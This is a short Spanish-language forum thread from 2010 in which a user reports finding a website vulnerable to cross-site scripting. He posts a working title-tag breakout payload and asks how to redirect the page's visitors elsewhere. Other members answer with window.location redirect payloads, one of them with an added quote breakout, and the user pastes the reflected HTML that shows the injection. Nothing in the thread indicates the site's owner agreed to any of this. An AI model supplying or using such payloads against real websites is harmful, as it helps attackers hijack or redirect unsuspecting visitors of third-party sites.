Ayuda con XSS

Iniciado por kamikazeeee, 31 Octubre 2010, 06:03 AM

0 Miembros y 2 Visitantes están viendo este tema.

kamikazeeee

hola! les cuento, encontré una web vulnerable a xss, intenté de varias formas pero ninguna funcionó, Pero Sí con ésta:

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

muestra el alert.

ahora, quiziera redireccionar la página a otro lugar, cómo podría hacerlo?

intenté con </TITLE><SCRIPT>window.location = "http://www.url.com";</SCRIPT> pero no va

Disculpas por la ignorancia, y gracias por la ayuda!


Shell Root

#1
Simon así es,
Código (javascript) [Seleccionar]
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

kamikazeeee

Cita de: Shell Root en 31 Octubre 2010, 16:53 PM
Simon así es,
Código (javascript) [Seleccionar]
</title><script>window.location = "http://www.mozilla.com/es-MX/";</script>

Eso es lo que dije que ya probé, y no funcionó :/

xassiz~

Revisa el código que le queda a la página después de su ejecución, a ver dónde está el fallo :P

kamikazeeee

El código queda así:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></TITLE><SCRIPT>alert("XSS");</SCRIPT></title><meta content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>" property="og:title"/><meta name="description" content="</TITLE><SCRIPT>alert("XSS");</SCRIPT>"

xassiz~

Prueba:
Código (javascript) [Seleccionar]

</title>"><script>window.location.href='http://www.mozilla.com/es-MX/';</script>

kamikazeeee